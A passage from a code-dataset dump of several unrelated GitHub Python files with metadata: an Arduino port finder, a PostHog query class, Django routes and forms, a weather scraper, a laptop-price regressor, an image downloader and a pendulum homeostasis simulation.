serial.tools.list_ports as lp\n\nSUPPORT_DEVICES = [\n \"Arduino\",\n]\n\ndef getArduinoDevice():\n \"\"\"\n Returns the Arduino Manufactured Device\n >>> getArduinoDevice()\n\n :return: Serial InterFace\n \"\"\"\n global SUPPORT_DEVICES\n\n for i in list(lp.comports()):\n for device in SUPPORT_DEVICES:\n if(\"Arduino\" in str(i.manufacturer)):\n return(i)\n\n return(None)\n", "repo_name": "saapo-ka-baadshah/ArduinoOscilloscope", "sub_path": "src/main_frame/SerialInterface/serial_ports.py", "file_name": "serial_ports.py", "file_ext": "py", "file_size_in_byte": 452, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "serial.tools.list_ports.comports", "line_number": 20, "usage_type": "call"}, {"api_name": "serial.tools.list_ports", "line_number": 20, "usage_type": "name"}]} +{"seq_id": "32889248631", "text": "from typing import Dict, Optional, Tuple\n\nfrom ee.clickhouse.queries.actor_base_query import ActorBaseQuery\nfrom ee.clickhouse.queries.stickiness.stickiness_event_query import StickinessEventsQuery\nfrom 
posthog.models.entity import Entity\nfrom posthog.models.filters.mixins.utils import cached_property\nfrom posthog.models.filters.stickiness_filter import StickinessFilter\nfrom posthog.models.team import Team\n\n\nclass ClickhouseStickinessActors(ActorBaseQuery):\n entity: Entity\n _filter: StickinessFilter\n\n def __init__(self, team: Team, entity: Entity, filter: StickinessFilter, **kwargs):\n super().__init__(team, filter, entity, **kwargs)\n\n @cached_property\n def aggregation_group_type_index(self):\n if self.entity.math == \"unique_group\":\n return self.entity.math_group_type_index\n return None\n\n def actor_query(self, limit_actors: Optional[bool] = True) -> Tuple[str, Dict]:\n events_query, event_params = StickinessEventsQuery(\n entity=self.entity, filter=self._filter, team=self._team\n ).get_query()\n\n return (\n f\"\"\"\n SELECT DISTINCT aggregation_target AS actor_id FROM ({events_query}) WHERE num_intervals = %(stickiness_day)s\n {\"LIMIT %(limit)s\" if limit_actors else \"\"}\n {\"OFFSET %(offset)s\" if limit_actors else \"\"}\n\n SETTINGS optimize_move_to_prewhere = 0\n \"\"\",\n {\n **event_params,\n \"stickiness_day\": self._filter.selected_interval,\n \"offset\": self._filter.offset,\n \"limit\": self._filter.limit,\n },\n )\n", "repo_name": "lokeshpahal/posthog1", "sub_path": "ee/clickhouse/queries/stickiness/stickiness_actors.py", "file_name": "stickiness_actors.py", "file_ext": "py", "file_size_in_byte": 1628, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "ee.clickhouse.queries.actor_base_query.ActorBaseQuery", "line_number": 11, "usage_type": "name"}, {"api_name": "posthog.models.entity.Entity", "line_number": 12, "usage_type": "name"}, {"api_name": "posthog.models.filters.stickiness_filter.StickinessFilter", "line_number": 13, "usage_type": "name"}, {"api_name": "posthog.models.team.Team", "line_number": 15, "usage_type": "name"}, {"api_name": "posthog.models.entity.Entity", "line_number": 15, "usage_type": "name"}, {"api_name": "posthog.models.filters.stickiness_filter.StickinessFilter", "line_number": 15, "usage_type": "name"}, {"api_name": "posthog.models.filters.mixins.utils.cached_property", "line_number": 18, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 24, "usage_type": "name"}, {"api_name": "ee.clickhouse.queries.stickiness.stickiness_event_query.StickinessEventsQuery", "line_number": 25, "usage_type": "call"}, {"api_name": "typing.Tuple", "line_number": 24, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 24, "usage_type": "name"}]} +{"seq_id": "70750103525", "text": "from django.urls import path\n\nfrom . 
import views\n\n\nurlpatterns = [\n path('products/', views.ProductListView.as_view()),\n path('orders/', views.OrdersListView.as_view()),\n path('create_product/', views.ProductCreateView.as_view()),\n path('hand_made_orders/', views.HandMadeOrdersListView.as_view()),\n path('users/', views.UsersListView.as_view()),\n path('images/', views.ImageListView.as_view())\n]\n", "repo_name": "L1nk0r/webMarketBackend", "sub_path": "surronshop/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 416, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 12, "usage_type": "call"}]} +{"seq_id": "15615373370", "text": "import requests \r\nfrom bs4 import BeautifulSoup as bs\r\n\r\ndef weather(city):\r\n headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'}\r\n req=requests.get(f'https://www.google.com/search?q=weather+{city}',headers=headers)\r\n data=bs(req.text , 'html.parser')\r\n\r\n time = data.select('#wob_dts')[0].getText().strip()\r\n info = data.select('#wob_dc')[0].getText().strip()\r\n weather = data.select('#wob_tm')[0].getText().strip()\r\n\r\n print(time)\r\n print(weather,'C°')\r\n print(info)\r\n\r\ncity=input('Enter your city:')\r\nweather(city)", "repo_name": "DanialHMD/Weather_Code", "sub_path": "weather.py", "file_name": "weather.py", "file_ext": "py", "file_size_in_byte": 641, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "requests.get", "line_number": 6, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 7, "usage_type": "call"}]} +{"seq_id": "16978137955", "text": "\nfrom pymongo import MongoClient\nfrom mongoengine import *\nfrom mongo_connect import Product\nimport seaborn as sns\nimport pandas as pd\nimport re\nimport matplotlib.pyplot as plt\nfrom sklearn import tree , preprocessing\nimport get_user_input\n# define a generator for reading database\n\n\n\n# def clean_mongo_data():\n# pass\n\n\n\n\ndef read_mongo(cursor):\n for doc in list(cursor):\n yield doc\n\n\nmongo_client = MongoClient('localhost', 27017)\ndb = mongo_client.laptops\ncol = db.product\ncursor = col.find()\n\ndocs = []\n# mongo_docs = list(cursor)\nwhat_not_need = ['ظرفیت حافظه داخلی' , 'محدوده سرعت پردازنده' , 'link' , 'فرکانس پردازنده' , 'مدل پردازنده' ,'مدل پردازنده گرافیکی' ,'نوع حافظه داخلی' , 'مشخصات حافظه داخلی' ,'نوع حافظه RAM']\n\n# print(mongo_docs[0])\n\n\n\nfor mongo_doc in read_mongo(cursor):\n pddoc = {}\n find_values = r'\\d+'\n for key ,value in mongo_doc.items():\n if key in what_not_need:\n continue\n elif key == 'سازنده پردازنده' :\n key = 'processor'\n elif key == 'سری پردازنده' :\n key = 'sprocessor'\n elif key == 'حافظه Cache':\n key = 'cacheM'\n value = float(re.search(find_values,value).group())\n elif key == 'ظرفیت حافظه RAM':\n key = 'RAMM'\n value = float(re.search(find_values,value).group())\n elif key == 'سازنده پردازنده گرافیکی':\n key = 'Graphic'\n elif key == 'حافظه اختصاصی پردازنده 
گرافیکی':\n key = 'GraphicM'\n value = re.search(find_values , value)\n if value == None :\n value = 0\n else:\n value = float(value.group())\n if value > 16 :\n value = value / 1000\n elif key =='_id' :\n key = 'brand'\n value = value.split()\n if(value == []):\n value = 'asus'\n else :\n value = value[0].lower()\n\n pddoc[key] = value\n docs.append(pddoc)\n\n\n# ****************************************************************************************\n# trying to get internal memory\n\n# for mongo_doc in mongo_docs:\n# for key , value in mongo_doc.items():\n\n# if key == 'ظرفیت حافظه داخلی':\n# print(value)\n# # print(mongo_doc['link'])\n# print(mongo_doc['مشخصات حافظه داخلی'])\n# print(mongo_doc['نوع حافظه داخلی'])\n# print('\\n\\n\\n')\n# pddoc['SSD'] = 512\n# pddoc[''] = 1000\n# continue\n# pddoc[key] = value\n# docs.append(pddoc)\n\n# print('\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n')\n# print(\"docs is \" , docs[:4])\n\n\n\n# ***************************************************************************************\n# IN first version of this , we will ignore the internal memory just to test the program\n#****************************************************************************************\n\n# print(docs)\ndata = pd.DataFrame(docs)\n\n\n# print(\"fucking data is \\n\\n\\n\" , data)\n# data.to_csv('/home/alireza/Python/jadi/project/lproj/laptops.csv')\n\n\n\noutput = data['price']\n\n# oe = preprocessing.OrdinalEncoder()\n# t_data = oe.fit_transform(data.drop(prcess_string , axis=1))\n\n\nnot_prcess_string = ['price' , 'cacheM' , 'GraphicM' , 'RAMM']\n\ndf_to_process = data.drop(not_prcess_string , axis=1)\nprcessed_df = df_to_process.apply(preprocessing.LabelEncoder().fit_transform)\n\n\nprocesse_string = ['brand' , 'processor' , 'Graphic' , 'sprocessor']\nfloat_df = data.drop(processe_string , axis=1)\nconcated_df = pd.concat([prcessed_df,float_df], axis=1, sort=False)\n# print(concated_df)\n\n\n\na = list(data['brand'])\nb = list(concated_df['brand'])\nbrand_co = dict((x, y) for x, y in zip(a, b))\n# print(\"brans are \" , brand_co)\n\na = list(data['processor'])\nb = list(concated_df['processor'])\nprocessor_co = dict((x, y) for x, y in zip(a, b))\n# print(\"processors are \" , processor_co)\n\n\na = list(data['Graphic'])\nb = list(concated_df['Graphic'])\nGraphic_co = dict((x, y) for x, y in zip(a, b))\n# print(\"graphics are \" , Graphic_co)\n\n\n\na = list(data['sprocessor'])\nb = list(concated_df['sprocessor'])\nsprocessor_co = dict((x, y) for x, y in zip(a, b))\n# print(\"seri processors are \" , sprocessor_co)\n\nclr = tree.DecisionTreeRegressor()\nclr = clr.fit(concated_df.drop(['price'] , axis=1) , output)\n\n\n\n# getting input from user\nbrand = get_user_input.get_brand()\ncacheM = get_user_input.get_cache()\nGraphic_m = get_user_input.get_GraphicM()\ngraphic = get_user_input.get_Graphic()\nprocessor = get_user_input.get_processor()\nsprocessor = get_user_input.get_sprocessor()\nram = get_user_input.get_ram()\n# print(\"graphic is \" , graphic)\n# print(Graphic_co[graphic])\npredict_this = [ brand_co[brand] , processor_co[processor] , Graphic_co[graphic],\n sprocessor_co[sprocessor], cacheM , Graphic_m ,\n ram ]\n\n# print(predict_this)\n\nans = clr.predict([predict_this])\nprint(ans[0])\n\n\n\n\n\n\n\n", "repo_name": "Al1r3z4asadi/laptop-recommend3r", "sub_path": "machine.py", "file_name": "machine.py", "file_ext": "py", "file_size_in_byte": 5173, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": 
[{"api_name": "pymongo.MongoClient", "line_number": 26, "usage_type": "call"}, {"api_name": "re.search", "line_number": 51, "usage_type": "call"}, {"api_name": "re.search", "line_number": 54, "usage_type": "call"}, {"api_name": "re.search", "line_number": 59, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 106, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.LabelEncoder", "line_number": 123, "usage_type": "call"}, {"api_name": "sklearn.preprocessing", "line_number": 123, "usage_type": "name"}, {"api_name": "pandas.concat", "line_number": 128, "usage_type": "call"}, {"api_name": "sklearn.tree.DecisionTreeRegressor", "line_number": 156, "usage_type": "call"}, {"api_name": "sklearn.tree", "line_number": 156, "usage_type": "name"}, {"api_name": "get_user_input.get_brand", "line_number": 162, "usage_type": "call"}, {"api_name": "get_user_input.get_cache", "line_number": 163, "usage_type": "call"}, {"api_name": "get_user_input.get_GraphicM", "line_number": 164, "usage_type": "call"}, {"api_name": "get_user_input.get_Graphic", "line_number": 165, "usage_type": "call"}, {"api_name": "get_user_input.get_processor", "line_number": 166, "usage_type": "call"}, {"api_name": "get_user_input.get_sprocessor", "line_number": 167, "usage_type": "call"}, {"api_name": "get_user_input.get_ram", "line_number": 168, "usage_type": "call"}]} +{"seq_id": "1188228085", "text": "# url to image\nimport numpy as np \nimport urllib.request\nimport cv2\nfrom skimage import io\n\n\n\nclass UrlToImage():\n \"\"\"docstring for UrlToImage\"\"\"\n def __init__(self, urls):\n super(UrlToImage, self).__init__()\n self.urls = urls\n##### ***** ##### ***** ##### ***** ##### ***** \n# Method : 1 \n##### ***** ##### ***** ##### ***** ##### ***** \n def url_to_img(self):\n for url in self.urls:\n resp = urllib.request.urlopen(url)\n image = np.asarray(bytearray(resp.read()), dtype='uint8')\n image = cv2.imdecode(image, cv2.IMREAD_COLOR)\n cv2.imshow(\"Image\", image)\n cv2.waitKey(0)\n \n##### ***** ##### ***** ##### ***** ##### ***** \n# Method : 2\n##### ***** ##### ***** ##### ***** ##### ***** \n def scikit_urltoimg(self):\n for url in self.urls:\n print(\"downloading %s\" % (url))\n image = io.imread(url)\n cv2.imshow(\"Incorrect\", image)\n cv2.imshow(\"Correct\", cv2.cvtColor(image, cv2.COLOR_BGR2RGB))\n cv2.waitKey(0) \n\n\nif __name__ == '__main__':\n urls = [\"https://images.dog.ceo/breeds/mastiff-tibetan/n02108551_660.jpg\",\n \"https://images.unsplash.com/photo-1491604612772-6853927639ef?ixlib=rb-1.2.1&auto=format&fit=crop&w=500&q=60\",\n \"https://images.unsplash.com/photo-1518914781460-a3ada465edec?ixlib=rb-1.2.1&auto=format&fit=crop&w=500&q=60\"]\n obj = UrlToImage(urls)\n # obj.url_to_img()\n obj.scikit_urltoimg()\n ", "repo_name": "ankitsuwal/ai_bootcamp", "sub_path": "codes/lecture_5/url_to_image.py", "file_name": "url_to_image.py", "file_ext": "py", "file_size_in_byte": 1501, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "urllib.request.request.urlopen", "line_number": 19, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 19, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 19, "usage_type": "name"}, {"api_name": "numpy.asarray", "line_number": 20, "usage_type": "call"}, {"api_name": "cv2.imdecode", "line_number": 21, "usage_type": "call"}, {"api_name": "cv2.IMREAD_COLOR", "line_number": 21, "usage_type": "attribute"}, {"api_name": "cv2.imshow", 
"line_number": 22, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 23, "usage_type": "call"}, {"api_name": "skimage.io.imread", "line_number": 31, "usage_type": "call"}, {"api_name": "skimage.io", "line_number": 31, "usage_type": "name"}, {"api_name": "cv2.imshow", "line_number": 32, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 33, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 33, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 33, "usage_type": "attribute"}, {"api_name": "cv2.waitKey", "line_number": 34, "usage_type": "call"}]} +{"seq_id": "27914685431", "text": "from django import forms\n\nfrom .models import Products, Meals\n\n\nclass ProductForm(forms.ModelForm): #forms.Form\n name = forms.CharField(\n widget=forms.TextInput(\n attrs ={\n \"placeholder\":\"Pass here new product name.\",\n \"size\":25,\n \"title\":\"New product name\"\n }\n )\n )\n food_type = forms.ChoiceField(choices = (\n (\"1\", \"Meat\"),\n (\"2\", \"Fruit\"),\n (\"3\", \"Vegetable\"), \n (\"4\", \"SeaFood\"),\n (\"5\", \"Nuts\"),\n (\"6\", \"Grains\"),\n (\"7\", \"Diary\")\n )\n )\n protein = forms.FloatField(widget = forms.NumberInput(attrs= {\"placeholder\":\"Protein content.\"}))\n carbohydrates = forms.FloatField(widget = forms.NumberInput(attrs= {\"placeholder\":\"Carbohydrates content.\"}))\n fat = forms.FloatField(widget = forms.NumberInput(attrs= {\"placeholder\":\"Fat content.\"}))\n description = forms.CharField(\n min_length=20, \n widget=forms.Textarea(\n attrs={\n \"placeholder\":\"Plese enter here product desctipion.\",\n \"class\":\"new-form\",\n \"rows\":15,\n \"cols\":50\n }\n )\n )\n quantity = forms.IntegerField(widget = forms.NumberInput(attrs={\"placeholder\":\"Grams of product per portion.\", \"size\":40}))\n price = forms.DecimalField(initial=0.99) \n \n class Meta: \n model = Products \n fields = [\"name\", \"food_type\", \"protein\", \"carbohydrates\", \"fat\", \"description\", \"quantity\", \"price\"]\n\n\n\nclass MealCreationForm(forms.Form):\n name = forms.CharField(max_length = 50) \n description = forms.CharField(\n min_length=20, \n required=False,\n widget=forms.Textarea(\n attrs={\n \"placeholder\":\"Plese enter here product desctipion.\",\n \"class\":\"new-form\",\n \"rows\":8,\n \"cols\":50\n }\n )\n )\n ingredient = forms.ModelMultipleChoiceField(\n Products.objects.all(),\n widget=forms.CheckboxSelectMultiple(\n attrs={}),\n )\n\n class Meta:\n model = Meals\n fields = [\"name\", \"ingredient\", \"description\"]\n\nclass MealUpdateForm(forms.Form):\n description = forms.CharField(\n min_length=20, \n widget=forms.Textarea(\n attrs={\n \"class\":\"new-form\",\n \"rows\":15,\n \"cols\":50\n }\n )\n )\n\n class Meta: \n model = Meals\n fields = [\"description\"]\n\nclass MealQuantityUpdate(forms.Form):\n Weight = forms.CharField(max_length=5)\n class Meta: \n model = Meals\n fields = [\"Weight\"]\n\n\n\n\n\n", "repo_name": "Piotr-Lukaszewski/Fitapplication", "sub_path": "Main/Food/forms.py", "file_name": "forms.py", "file_ext": "py", "file_size_in_byte": 2740, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.forms.ModelForm", "line_number": 6, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 6, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 7, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 7, "usage_type": "name"}, {"api_name": 
"django.forms.TextInput", "line_number": 8, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 8, "usage_type": "name"}, {"api_name": "django.forms.ChoiceField", "line_number": 16, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 16, "usage_type": "name"}, {"api_name": "django.forms.FloatField", "line_number": 26, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 26, "usage_type": "name"}, {"api_name": "django.forms.NumberInput", "line_number": 26, "usage_type": "call"}, {"api_name": "django.forms.FloatField", "line_number": 27, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 27, "usage_type": "name"}, {"api_name": "django.forms.NumberInput", "line_number": 27, "usage_type": "call"}, {"api_name": "django.forms.FloatField", "line_number": 28, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 28, "usage_type": "name"}, {"api_name": "django.forms.NumberInput", "line_number": 28, "usage_type": "call"}, {"api_name": "django.forms.CharField", "line_number": 29, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 29, "usage_type": "name"}, {"api_name": "django.forms.Textarea", "line_number": 31, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 31, "usage_type": "name"}, {"api_name": "django.forms.IntegerField", "line_number": 40, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 40, "usage_type": "name"}, {"api_name": "django.forms.NumberInput", "line_number": 40, "usage_type": "call"}, {"api_name": "django.forms.DecimalField", "line_number": 41, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 41, "usage_type": "name"}, {"api_name": "models.Products", "line_number": 44, "usage_type": "name"}, {"api_name": "django.forms.Form", "line_number": 49, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 49, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 50, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 50, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 51, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 51, "usage_type": "name"}, {"api_name": "django.forms.Textarea", "line_number": 54, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 54, "usage_type": "name"}, {"api_name": "django.forms.ModelMultipleChoiceField", "line_number": 63, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 63, "usage_type": "name"}, {"api_name": "models.Products.objects.all", "line_number": 64, "usage_type": "call"}, {"api_name": "models.Products.objects", "line_number": 64, "usage_type": "attribute"}, {"api_name": "models.Products", "line_number": 64, "usage_type": "name"}, {"api_name": "django.forms.CheckboxSelectMultiple", "line_number": 65, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 65, "usage_type": "name"}, {"api_name": "models.Meals", "line_number": 70, "usage_type": "name"}, {"api_name": "django.forms.Form", "line_number": 73, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 73, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 74, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 74, "usage_type": "name"}, {"api_name": "django.forms.Textarea", "line_number": 76, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 76, "usage_type": "name"}, {"api_name": "models.Meals", "line_number": 86, "usage_type": "name"}, 
{"api_name": "django.forms.Form", "line_number": 89, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 89, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 90, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 90, "usage_type": "name"}, {"api_name": "models.Meals", "line_number": 92, "usage_type": "name"}]} +{"seq_id": "13703931998", "text": "\"\"\"\r\nhomeostasis example according to playfulmachines, ca. pgs. 65-67. The numbers of the formulas in the comments correspond to the formulas in the book.\r\ncontrol timesteps (i.e. 2000) with --numsteps 2000\r\ncontrol mode with --mode animate|none to have a animation of the pendulum\r\ncontrol disturbance at 950 timesteps with --disturbance true|false\r\ncontrol disturbance_noise with --disturbance_noise 0.01\r\n\"\"\"\r\n\r\nimport argparse\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.animation as animation\r\n\r\n# global variable\r\nx_ = 0\r\nline = 0\r\n\r\n\r\ndef animate(i):\r\n global x_\r\n line_x = np.zeros(2)\r\n line_y = np.zeros(2)\r\n numsteps = x_.shape[0]\r\n line_x[1] = x_.reshape(numsteps, -1)[i][0]\r\n line_y[1] = x_.reshape(numsteps, -1)[i][1]\r\n line.set_data(line_x, line_y)\r\n return line,\r\n\r\n\r\ndef init():\r\n line.set_data([], [])\r\n return line,\r\n\r\ndef main(args):\r\n global x_, line\r\n ndim_s = 2\r\n ndim_m = 1\r\n\r\n numsteps = args.numsteps\r\n mode = args.mode\r\n disturbance = args.disturbance\r\n disturbance_noise = args.disturbance_noise\r\n\r\n # system\r\n angle = np.random.uniform(- np.pi/8.0, + np.pi/8.0, size=(1,1))\r\n angleSpeed = np.ones_like(angle) * 0.0\r\n l = 1.5\r\n g = -0.01\r\n friction = 0.99\r\n motorTorque = 0.01\r\n\r\n # brain\r\n x = np.zeros((ndim_s, 1))\r\n xPred = np.zeros_like(x)\r\n xError = np.zeros_like(x)\r\n y = np.zeros((ndim_m, 1))\r\n\r\n A = np.zeros([ndim_s, ndim_m])\r\n b = np.zeros_like(x)\r\n\r\n C = np.random.uniform(-1e-1, 1e-1, size=(ndim_m, ndim_s))\r\n h = np.random.uniform(-1e-3, 1e-3, size=y.shape) # ones_like(y) * 0.1\r\n\r\n epsA = 0.05\r\n epsC = 0.15\r\n # global angle, angleSpeed, A, C, h, b, y\r\n\r\n # initialize logging variables\r\n x_ = np.zeros((numsteps,) + x.shape)\r\n xPred_ = np.zeros((numsteps,) + xPred.shape)\r\n xError_ = np.zeros((numsteps,) + xError.shape)\r\n y_ = np.zeros((numsteps,) + y.shape)\r\n A_ = np.zeros((numsteps,1) + A.shape)\r\n C_ = np.zeros((numsteps,1) + C.shape)\r\n angle_ = np.zeros((numsteps,) + angle.shape)\r\n angleSpeed_ = np.zeros((numsteps,) + angleSpeed.shape)\r\n\r\n\r\n\r\n for i in range(numsteps):\r\n\r\n # new measurement\r\n x[0][0] = np.sin(angle[0,0])\r\n x[1][0] = np.cos(angle[0,0])\r\n # print(\"x:\", x)\r\n\r\n\t # calculate prediction error\r\n xError = x - xPred\r\n # print(\"xError: \", xError)\r\n\r\n # Train Model\r\n dA = epsA * xError * y # formula 4.5\r\n A += dA\r\n db = epsA * xError # formula 4.6\r\n b += db\r\n\r\n\t # calculate norm from A for logging\r\n # Anorm = np.linalg.norm(A, 2)\r\n\r\n # print(\"|A| = %f, |dA| = %f\" % (Anorm, np.linalg.norm(dA, 2)))\r\n # print(\"|b| = %f, |db| = %f\" % (np.linalg.norm(b, 2), np.linalg.norm(db, 2)))\r\n\r\n # Train Controller\r\n z = np.dot(C, x) + h # formula 4.9+ this formula has some strange notion in the book which is a bit confusing. 
On page 81, this easy form of the formula is presented again.\r\n # print(\"z:\", z, z.shape)\r\n\r\n g_z = 1 - np.power(np.tanh(z),2) # formula 4.9+\r\n #print(\"g_z:\", g_z, g_z.shape)\r\n\r\n\r\n eta = np.dot(A.T, xError) * g_z # formula 4.9 does exactly the same than the long variant\r\n #print(\"eta:\", eta.shape)\r\n\r\n # eta = np.zeros_like(y)\r\n # for m in range(ndim_m):\r\n # for s in range(ndim_s):\r\n # eta[m] += A[s][m] * g_z[m][0] * xError[s][0]\r\n\r\n #print(eta_old - eta)\r\n #print(eta)\r\n #print(\"eta:\", eta.shape)\r\n #print(\"x:\",x)\r\n\r\n dC = epsC * np.dot(eta , x.T) # formula 4.7\r\n dh = epsC * eta # formula 4.8\r\n\r\n # print(\"dC.shape\", dC.shape)\r\n # dC = np.zeros_like(C)\r\n # dh = np.zeros_like(h)\r\n\r\n C += dC\r\n h += dh\r\n\r\n # Cnorm = np.linalg.norm(C, 2)\r\n\r\n # # print(\"A b C h:\", A, b, C, h)\r\n\r\n # Controler\r\n y = np.tanh(np.dot(C, x) + h) # formula 4.3\r\n #print(\"y:\", y)\r\n\r\n # Feed forward model\r\n # predict next sensor state\r\n xPred = np.dot(A, y) + b\r\n\r\n # angleSpeed += motorTorque * y[0][0]\r\n angleSpeed = motorTorque * np.reshape(y[0][0],(1,1))\r\n\r\n # friction\r\n angleSpeed *= friction\r\n\r\n # # gravity\r\n angleSpeed += np.cos(angle) * g\r\n\r\n # add disturbance after 1000 timesteps\r\n if(i % 1000 > 950 and disturbance):\r\n angleSpeed += 0.1\r\n\r\n if(disturbance_noise>0):\r\n angleSpeed += np.random.standard_normal(1) * disturbance_noise\r\n\r\n # calculate new position\r\n angle += angleSpeed\r\n\r\n if(angle > 2.0 * np.pi):\r\n angle -= 2.0 * np.pi\r\n if(angle < 0.0):\r\n angle += 2.0 * np.pi\r\n #angle = angleSpeed\r\n\r\n\r\n # logging\r\n x_[i] = x\r\n xPred_[i] = xPred\r\n xError_[i] = xError\r\n A_[i] = A\r\n C_[i] = C\r\n y_[i] = y\r\n angle_[i] = angle\r\n angleSpeed_[i] = angleSpeed\r\n\r\n # print(\"x_.shape\", x_.shape)\r\n\r\n\r\n plt.figure()\r\n plt.subplot(611)\r\n plt.plot([4]*numsteps, \"k--\", alpha=0.5, label = \"xP0\", linewidth=1.0)\r\n plt.plot(x_.reshape((numsteps, -1)), \"k-\", alpha=0.5, label=\"x\", linewidth=1.0)\r\n plt.plot(xPred_.reshape((numsteps, -1)) + 2, \"b-\", alpha=0.5, label=\"xP\", linewidth=1.0)\r\n plt.plot(xError_.reshape((numsteps, -1)) + 4, \"r-\", alpha=0.5, label=\"xE\", linewidth=1.0)\r\n plt.legend()\r\n plt.subplot(612)\r\n plt.plot(y_.reshape((numsteps, -1)), \"k-\", label=\"y\", linewidth=1.0)\r\n plt.legend()\r\n plt.subplot(613)\r\n plt.plot(angle_.reshape((numsteps, -1)), \"k-\", label=\"angle\", linewidth=1.0)\r\n plt.legend()\r\n plt.subplot(614)\r\n plt.plot(angleSpeed_.reshape((numsteps, -1)), \"k-\", label=\"angledot\", linewidth=1.0)\r\n plt.legend()\r\n plt.subplot(615)\r\n plt.plot(A_.reshape((numsteps, -1)), \"k-\", label=\"A\", linewidth=1.0)\r\n plt.legend()\r\n plt.subplot(616)\r\n plt.plot(C_.reshape((numsteps, -1)), \"k-\", label=\"C\", linewidth=1.0)\r\n plt.legend()\r\n\r\n if(mode == \"animate\"):\r\n # animate the pendulum\r\n fig = plt.figure(figsize=(8, 8))\r\n ax = plt.axes(xlim=(-2, 2), ylim=(-2, 2))\r\n line, = ax.plot([], [], lw=2)\r\n anim = animation.FuncAnimation(fig, animate, init_func=init, frames=numsteps, interval=20, blit=True)\r\n\r\n plt.show()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument(\"-ns\", \"--numsteps\", type=int, default=2000)\r\n parser.add_argument(\"-m\", \"--mode\", type=str, default = \"none\")\r\n parser.add_argument(\"-d\", \"--disturbance\", type=bool, default = False)\r\n parser.add_argument(\"-dn\", \"--disturbance_noise\", type=float, 
default=0.0)\r\n args = parser.parse_args()\r\n main(args)\r\n", "repo_name": "AndreasGerken/selfRegulation", "sub_path": "python/pendulum_homeostasis.py", "file_name": "pendulum_homeostasis.py", "file_ext": "py", "file_size_in_byte": 6808, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.zeros", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.random.uniform", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 45, "usage_type": "attribute"}, {"api_name": "numpy.pi", "line_number": 45, "usage_type": "attribute"}, {"api_name": "numpy.ones_like", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.random.uniform", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 61, 